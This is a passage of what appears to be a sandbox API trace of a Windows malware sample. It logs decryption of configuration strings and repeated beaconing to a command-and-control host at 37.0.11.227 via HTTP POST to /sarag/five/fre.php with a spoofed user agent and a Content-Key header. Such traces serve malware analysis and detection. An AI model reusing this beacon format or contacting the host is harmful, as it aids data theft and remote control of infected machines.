ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0276.984] GetProcessHeap () returned 0x690000 [0276.984] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0276.984] GetProcessHeap () returned 0x690000 [0276.984] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0276.984] GetProcessHeap () returned 0x690000 [0276.985] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0276.985] GetProcessHeap () returned 0x690000 [0276.985] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0276.986] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.986] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0276.991] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.991] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0276.997] GetProcessHeap () returned 0x690000 [0276.997] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0276.998] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.998] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0276.999] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.999] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0277.000] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.000] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0277.000] GetProcessHeap () returned 0x690000 [0277.000] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0277.001] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.001] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0277.002] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.002] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0277.002] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.003] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0277.003] GetProcessHeap () returned 0x690000 [0277.003] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0277.051] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.051] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0277.052] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.052] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0277.053] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.053] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0277.054] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.054] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0277.057] GetProcessHeap () returned 0x690000 [0277.057] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0277.060] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0277.060] GetProcessHeap () returned 0x690000 [0277.060] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3e0 [0277.060] socket (af=2, type=1, protocol=6) returned 0x87c [0277.061] connect (s=0x87c, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0277.084] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0277.084] GetProcessHeap () returned 0x690000 [0277.084] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0277.084] GetProcessHeap () returned 0x690000 [0277.084] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0277.085] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0277.086] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0277.086] GetProcessHeap () returned 0x690000 [0277.086] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af980 [0277.086] GetProcessHeap () returned 0x690000 [0277.087] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0277.089] GetProcessHeap () returned 0x690000 [0277.089] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0277.089] GetProcessHeap () returned 0x690000 [0277.089] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0277.089] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0277.090] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0277.090] GetProcessHeap () returned 0x690000 [0277.090] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0277.090] GetProcessHeap () returned 0x690000 [0277.091] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0277.091] send (s=0x87c, buf=0x6ad508*, len=242, flags=0) returned 242 [0277.091] send (s=0x87c, buf=0x6aba40*, len=159, flags=0) returned 159 [0277.092] GetProcessHeap () returned 0x690000 [0277.092] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0277.092] recv (in: s=0x87c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0277.167] GetProcessHeap () returned 0x690000 [0277.167] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0277.167] GetProcessHeap () returned 0x690000 [0277.167] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0277.167] GetProcessHeap () returned 0x690000 [0277.168] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af980 | out: hHeap=0x690000) returned 1 [0277.168] GetProcessHeap () returned 0x690000 [0277.168] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0277.168] closesocket (s=0x87c) returned 0 [0277.169] GetProcessHeap () returned 0x690000 [0277.169] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3e0 | out: hHeap=0x690000) returned 1 [0277.169] GetProcessHeap () returned 0x690000 [0277.169] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0277.169] GetProcessHeap () returned 0x690000 [0277.169] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0277.169] GetProcessHeap () returned 0x690000 [0277.170] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0277.181] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x163c) returned 0x87c [0277.182] Sleep (dwMilliseconds=0xea60) [0277.184] GetProcessHeap () returned 0x690000 [0277.184] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0277.185] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.185] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0277.236] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.237] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0277.242] GetProcessHeap () returned 0x690000 [0277.242] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0277.243] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.243] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0277.246] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.250] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0277.250] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.251] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0277.251] GetProcessHeap () returned 0x690000 [0277.251] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0277.252] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.252] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0277.253] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.253] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0277.253] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.254] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0277.254] GetProcessHeap () returned 0x690000 [0277.254] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0277.254] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.255] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0277.255] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.257] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0277.258] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.258] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0277.259] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.259] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0277.259] GetProcessHeap () returned 0x690000 [0277.259] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0277.259] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0277.259] GetProcessHeap () returned 0x690000 [0277.260] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0277.260] GetProcessHeap () returned 0x690000 [0277.260] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0277.260] GetProcessHeap () returned 0x690000 [0277.261] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0277.261] GetProcessHeap () returned 0x690000 [0277.261] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0277.261] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.262] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0277.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.266] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0277.272] GetProcessHeap () returned 0x690000 [0277.272] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0277.273] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.273] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0277.274] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.274] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0277.274] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.275] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0277.275] GetProcessHeap () returned 0x690000 [0277.275] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0277.276] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.276] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0277.277] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.277] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0277.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.290] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0277.304] GetProcessHeap () returned 0x690000 [0277.304] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0277.305] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.305] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0277.306] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.306] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0277.307] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.307] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0277.308] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.308] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0277.308] GetProcessHeap () returned 0x690000 [0277.308] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0277.308] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0277.308] GetProcessHeap () returned 0x690000 [0277.308] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab390 [0277.308] socket (af=2, type=1, protocol=6) returned 0x880 [0277.309] connect (s=0x880, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0277.335] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0277.335] GetProcessHeap () returned 0x690000 [0277.335] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0277.335] GetProcessHeap () returned 0x690000 [0277.335] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0277.336] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0277.337] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0277.337] GetProcessHeap () returned 0x690000 [0277.337] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af5c0 [0277.337] GetProcessHeap () returned 0x690000 [0277.337] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0277.338] GetProcessHeap () returned 0x690000 [0277.338] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0277.338] GetProcessHeap () returned 0x690000 [0277.338] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0277.339] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0277.340] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0277.340] GetProcessHeap () returned 0x690000 [0277.340] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0277.340] GetProcessHeap () returned 0x690000 [0277.340] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0277.340] send (s=0x880, buf=0x6ad508*, len=242, flags=0) returned 242 [0277.341] send (s=0x880, buf=0x6aba40*, len=159, flags=0) returned 159 [0277.341] GetProcessHeap () returned 0x690000 [0277.341] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0277.341] recv (in: s=0x880, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0277.414] GetProcessHeap () returned 0x690000 [0277.415] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0277.415] GetProcessHeap () returned 0x690000 [0277.415] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0277.415] GetProcessHeap () returned 0x690000 [0277.415] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af5c0 | out: hHeap=0x690000) returned 1 [0277.415] GetProcessHeap () returned 0x690000 [0277.416] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0277.416] closesocket (s=0x880) returned 0 [0277.416] GetProcessHeap () returned 0x690000 [0277.416] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab390 | out: hHeap=0x690000) returned 1 [0277.416] GetProcessHeap () returned 0x690000 [0277.417] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0277.417] GetProcessHeap () returned 0x690000 [0277.417] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0277.417] GetProcessHeap () returned 0x690000 [0277.418] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0277.418] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1640) returned 0x880 [0277.420] Sleep (dwMilliseconds=0xea60) [0277.422] GetProcessHeap () returned 0x690000 [0277.422] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0277.423] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.424] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0277.430] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.434] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0277.442] GetProcessHeap () returned 0x690000 [0277.442] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0277.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.443] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0277.444] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.445] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0277.445] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.446] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0277.446] GetProcessHeap () returned 0x690000 [0277.446] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0277.447] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.447] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0277.448] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.448] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0277.448] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.449] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0277.449] GetProcessHeap () returned 0x690000 [0277.449] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0277.449] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.450] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0277.450] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.450] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0277.451] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.451] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0277.452] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.457] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0277.457] GetProcessHeap () returned 0x690000 [0277.457] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0277.458] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0277.458] GetProcessHeap () returned 0x690000 [0277.458] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0277.458] GetProcessHeap () returned 0x690000 [0277.459] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0277.459] GetProcessHeap () returned 0x690000 [0277.459] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0277.459] GetProcessHeap () returned 0x690000 [0277.459] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0277.460] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.460] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0277.464] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.464] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0277.471] GetProcessHeap () returned 0x690000 [0277.471] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0277.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 